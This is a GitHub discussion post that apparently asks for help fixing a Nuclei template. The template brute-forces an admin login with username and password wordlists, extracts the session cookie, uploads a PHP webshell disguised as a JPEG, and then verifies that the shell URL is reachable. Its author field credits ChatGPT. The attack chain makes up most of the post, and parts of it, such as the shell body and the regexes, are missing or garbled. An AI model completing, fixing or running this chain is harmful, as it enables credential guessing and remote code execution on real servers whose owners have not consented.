ProjectDiscovery
Dictionary import problem #6318
Unanswered
JackeyLov5
asked this question in
Q&A
Replies: 0 comments
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Uh oh!
There was an error while loading. Please reload this page.
-
This is a template poc for uploading a shell after logging in. It works fine when I use a list for user and pass, but an error occurs when I change to a file import.
`id: login-upload-rce-complete
info:
name: 登录爆破 + 上传 WebShell + 验证
author: ChatGPT
severity: critical
description: |
使用用户名/密码爆破登录,提取 PHPSESSID,再上传 webshell 并验证。
http:
Step 1: 登录,提取 PHPSESSID
raw:
|
POST /admin/auth/login.html HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Origin: http://{{Hostname}}
Referer: http://{{Hostname}}/admin/auth/index.html
User-Agent: Mozilla/5.0
Connection: close
username={{username}}&password={{password}}
payloads:
username:
- file: "usernames.txt"
password:
- file: "passwords.txt"
attack: clusterbomb
extractors:
name: session_id
internal: true
part: header
group: 1
regex:
Step 2: 上传 WebShell
raw:
|
POST /admin/base/upload HTTP/1.1
Host: {{Hostname}}
Cookie: PHPSESSID={{session_id}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
User-Agent: Mozilla/5.0
Connection: close
------WebKitFormBoundary
Content-Disposition: form-data; name="media"; filename="1.php"
Content-Type: image/jpeg
------WebKitFormBoundary--
matchers:
part: body
words:
extractors:
type: regex
part: body
internal: true
name: upload_path_raw
regex:
type: dsl
name: upload_path
internal: true
dsl:
Step 3: 验证 WebShell
raw:
GET /uploads/{{upload_path}} HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0
Accept: text/html
Connection: close
matchers:
dsl:
extractors:
name: shell_url
dsl:
`
This code is in file format (wrong). It is OK to write username and password directly in a list, but it is obviously not elegant enough. Can any expert tell me how to change it? Thank you
Beta Was this translation helpful? Give feedback.
All reactions